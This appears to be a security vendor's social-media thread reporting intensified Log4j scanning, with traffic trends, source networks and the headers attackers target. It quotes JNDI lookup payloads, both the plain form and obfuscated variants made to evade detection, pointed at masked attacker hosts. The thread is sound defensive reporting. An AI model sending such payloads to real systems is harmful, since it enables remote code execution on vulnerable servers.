Quick update regarding the log4j CVE: within the last 24h, we detected that scan activity with malicious payloads intensified on the customers we protect at
Conversation
On the other hand, number of distinct IPs is roughly stable. The increase of malicious requests/IP can be explained by the fact that IPs are trying different payloads.
Replying to
Not only do they try the classical ${jndi:ldap://xx.xx.com:xx/xx}, they also encode/modify their payloads to try to bypass most simple detection techniques, e.g. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.xxxx.xxx.com}
1
2
or Mozilla ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.xxx.com/a}.
Attackers attempt to go trough by testing all headers, ranging from User-Agent, Accept-Encoding to Cache-Control or Pragma. Even less common headers like X-Requested-With are used by attackers.
1
1
For the moment, the most active ASes are DIGITALOCEAN-ASN and Contabo GmbH, followed by OVH SAS.